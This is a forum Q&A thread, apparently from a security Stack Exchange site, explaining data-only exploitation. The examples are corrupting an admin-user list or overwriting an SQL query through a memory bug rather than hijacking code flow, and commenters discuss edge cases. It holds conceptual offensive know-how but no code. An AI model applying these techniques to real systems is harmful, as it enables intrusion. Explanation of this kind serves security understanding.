3

I was wondering, and after trying to read for the past several months I got totally lost and don't understand this concept. Could someone please explain in simple words the concept of data only attacks, what's their purpose and why choose this method over others?

Note: I am familiar with other techniques such as the various ret2, jop/rop,...

Additionally, I would appreciate it if someone who knew a "cheat sheet"/wiki-like site/GitHub that shows modern concepts regarding exploitation(not old stuff that the internet is full with). I am pretty sure it could help a lot of people here as well.

My goal is to help make things more secure and I really want to contribute my part to aid.

Improve this question
2

1 Answer 1

Reset to default
2

Data only exploitation is the mind-set / understanding that:

  1. A lot of effort has been put into anti-exploitation techniques in recent years, making existing exploitation strategies more difficult.
  2. Most of that effort revolves around prevention of code subversion. i.e, where the end goal of the attacker is to control code execution.

Contrary to that, in certain cases, code execution may be merely a means to an end such as extracting personal information from a mobile device, gaining access to a remote server, deleting valued data, or shutting down major infrastructure at just the right moment.

A data only exploitation approach suggests that instead of manipulating the code execution flow directly (by overwriting code with a shellcode, writing code on the stack and overwriting the stack address) or indirectly (creating a ROP chain, bypassing CFI) an attacker may also modify data in order to achieve a desired outcome.

Examples may make this easier to understand:

  1. In the most basic sense, this means that instead of executing a shellcode and spawning a shell an attacker may use a relative-dword-write primitive to add a new user to the linked-list of admin users and then use it to login into the system.

  2. Similarly, a buffer overflow of some sorts may be used to overwrite an SQL query to turn a memory corruption to an SQL injection. Either, again, inserting some sort of desired entry or extracting information from an internal database.

Improve this answer
3
  • 1
    Hmm, I had a recent case where I found an mscoree.dll inside of which no code had been manipulated. Instead only the import directory had been manipulated to include another DLL. The effect was that the now statically imported DLL got to subvert the (CLR) process very early on. Would this count as data-only exploitation as well?
    – 0xC0000022L
    Commented Dec 7, 2022 at 8:55
  • @0xC0000022L I'd count the entire DLL as "changing code" (regardless of whether actual assembly instructions are modified) but it really a semantics question I think. An interesting one, though, but I don't think one that has a definitive answer.
    – NirIzr
    Commented Dec 7, 2022 at 9:58
  • @0xC0000022L If I may add to your question, JIT makes this even more difficult to define well. Should exploitation that gains code execution by modifying / manipulating JIT compilation code be considered "Data only exploitation"? :D
    – NirIzr
    Commented Dec 7, 2022 at 10:01

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.